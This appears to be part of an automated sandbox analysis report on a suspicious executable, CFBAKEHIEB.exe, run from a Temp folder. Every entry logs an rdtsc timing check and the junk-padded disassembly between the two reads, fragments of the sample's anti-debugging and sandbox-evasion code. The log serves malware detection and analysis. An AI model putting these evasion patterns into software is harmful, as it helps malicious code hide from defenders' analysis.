Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E76F6 second address: 5E775F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E108FDBDh 0x00000009 jmp 00007F12E108FDC3h 0x0000000e popad 0x0000000f jnp 00007F12E108FDCCh 0x00000015 jmp 00007F12E108FDC7h 0x0000001a popad 0x0000001b jbe 00007F12E108FDCEh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 pop eax 0x00000025 jno 00007F12E108FDB6h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E78B1 second address: 5E7915 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F12E0FAFC7Ch 0x00000008 pushad 0x00000009 jmp 00007F12E0FAFC86h 0x0000000e jnc 00007F12E0FAFC76h 0x00000014 jl 00007F12E0FAFC76h 0x0000001a jnc 00007F12E0FAFC76h 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 jl 00007F12E0FAFCA7h 0x00000029 jmp 00007F12E0FAFC7Ch 0x0000002e pushad 0x0000002f jmp 00007F12E0FAFC85h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5EC424 second address: 5EC42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5EC582 second address: 5EC58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F12E0FAFC76h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5EC58C second address: 5EC59A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F12E108FDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5EC59A second address: 5EC59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5EC6EB second address: 5EC70A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F12E108FDBCh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5EC70A second address: 5EC70F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5ECAC7 second address: 5ECAD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5950EA second address: 595141 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F12E0FAFC7Dh 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F12E0FAFC78h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov cx, 5E51h 0x00000031 push eax 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jp 00007F12E0FAFC76h 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5ECE44 second address: 5ECE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E108FDBBh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F12E108FDBDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5ECE64 second address: 5ECE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F30CD second address: 5F30E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F12E108FDBFh 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3233 second address: 5F3244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007F12E0FAFC7Ch 0x0000000b jng 00007F12E0FAFC76h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3244 second address: 5F3295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F12E108FDBEh 0x00000008 jmp 00007F12E108FDC1h 0x0000000d jmp 00007F12E108FDC3h 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F12E108FDBAh 0x00000021 jng 00007F12E108FDB6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3295 second address: 5F329A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3680 second address: 5F3687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3687 second address: 5F368C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F395F second address: 5F3965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3965 second address: 5F396B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F396B second address: 5F3971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3971 second address: 5F3976 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4129 second address: 5F412D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F49CA second address: 5F49D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F49D9 second address: 5F4A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F12E108FDC6h 0x0000000b jmp 00007F12E108FDBFh 0x00000010 jne 00007F12E108FDC0h 0x00000016 jmp 00007F12E108FDBAh 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f jmp 00007F12E108FDC7h 0x00000024 pushad 0x00000025 popad 0x00000026 pop eax 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4A32 second address: 5F4A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4A38 second address: 5F4A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E108FDC4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4A50 second address: 5F4A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4CD4 second address: 5F4CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F12E108FDBEh 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4CEB second address: 5F4CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4CF5 second address: 5F4D14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jg 00007F12E108FDFAh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FA7B7 second address: 5FA7BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FA7BD second address: 5FA7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FA7C3 second address: 5FA7C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF3FD second address: 5FF401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF401 second address: 5FF405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF405 second address: 5FF40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF40B second address: 5FF42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F12E0FAFC88h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF718 second address: 5FF738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC2h 0x00000007 je 00007F12E108FDB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF738 second address: 5FF73E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF73E second address: 5FF75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F12E108FDC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF75F second address: 5FF76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF8D9 second address: 5FF8E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FFA45 second address: 5FFA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F12E0FAFC7Ah 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FFA53 second address: 5FFA67 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F12E108FDBEh 0x00000008 jns 00007F12E108FDB6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FFA67 second address: 5FFA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FFA6B second address: 5FFAB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F12E108FDC3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F12E108FDBBh 0x00000017 jmp 00007F12E108FDBBh 0x0000001c push edi 0x0000001d pop edi 0x0000001e popad 0x0000001f jmp 00007F12E108FDC0h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FFAB4 second address: 5FFAB9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FFAB9 second address: 5FFAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 jo 00007F12E108FDBCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 606D98 second address: 606DDE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 jmp 00007F12E0FAFC86h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F12E0FAFC84h 0x00000014 ja 00007F12E0FAFC82h 0x0000001a push esi 0x0000001b pop esi 0x0000001c jmp 00007F12E0FAFC7Ah 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 607532 second address: 607537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 607537 second address: 60753D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 60753D second address: 607541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 607541 second address: 607576 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jc 00007F12E0FAFC76h 0x00000012 pop ebx 0x00000013 jmp 00007F12E0FAFC7Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F12E0FAFC84h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 608420 second address: 608424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 608424 second address: 608450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E0FAFC89h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F12E0FAFC76h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 608450 second address: 608454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 608454 second address: 60846F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F12E0FAFC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F12E0FAFC81h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 60846F second address: 60847D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E108FDBAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 60847D second address: 60849D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F12E0FAFC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F12E0FAFC82h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 608C16 second address: 608C20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 608C20 second address: 608C42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F12E0FAFC7Eh 0x00000010 push edx 0x00000011 pop edx 0x00000012 jp 00007F12E0FAFC76h 0x00000018 jmp 00007F12E0FAFC7Ah 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6069AA second address: 6069B6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F12E108FDB6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 60F24B second address: 60F25F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F12E0FAFC7Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 60F25F second address: 60F265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 61AC89 second address: 61AC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 61ADEF second address: 61ADF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 61ADF3 second address: 61ADF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 61ADF7 second address: 61AE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F12E108FDB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F12E108FDBCh 0x00000012 jno 00007F12E108FDB6h 0x00000018 jnc 00007F12E108FDB6h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 61AE1D second address: 61AE29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F12E0FAFC76h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 61AE29 second address: 61AE2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 620B86 second address: 620BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E0FAFC85h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6259B0 second address: 6259B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6259B6 second address: 6259DD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F12E0FAFC76h 0x00000008 jmp 00007F12E0FAFC81h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F12E0FAFC78h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 62D843 second address: 62D849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 62D849 second address: 62D862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F12E0FAFC84h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 54D3FA second address: 54D400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 54D400 second address: 54D404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 62FBDC second address: 62FBE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 62FBE4 second address: 62FC29 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F12E0FAFC8Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F12E0FAFC97h 0x00000010 jmp 00007F12E0FAFC85h 0x00000015 jo 00007F12E0FAFC7Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 632025 second address: 632058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBCh 0x00000007 jmp 00007F12E108FDC2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jno 00007F12E108FDB6h 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 632058 second address: 63205C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 63205C second address: 632078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 631EC4 second address: 631ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007F12E0FAFC7Ch 0x0000000b js 00007F12E0FAFC76h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 631ED5 second address: 631EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F12E108FDB6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
